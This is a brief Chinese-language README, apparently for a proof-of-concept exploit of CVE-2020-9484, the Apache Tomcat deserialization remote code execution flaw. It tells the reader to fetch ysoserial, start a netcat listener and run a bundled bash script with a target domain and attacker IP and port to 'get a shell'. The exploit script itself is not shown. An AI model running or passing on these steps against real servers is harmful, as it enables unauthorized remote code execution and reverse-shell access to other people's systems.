
CVE-2020-9484 的 PoC
Apache Tomcat 反序列化远程代码执行(CVE-2020-9484)
阅读文档 »
1. 克隆此仓库,然后你就可以使用 CVE-2020-9484,并在需要时修改源代码。
2. 下载 ysoserial jar
3. 将 CVE-2020-9484 和 ysoserial.jar 放在同一目录下
4. 获得 shell!
为了简化 CVE-2020-9484 的使用,我们编写了一个简单的 bash 脚本。
利用时,你需要准备一个 netcat 监听器。
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
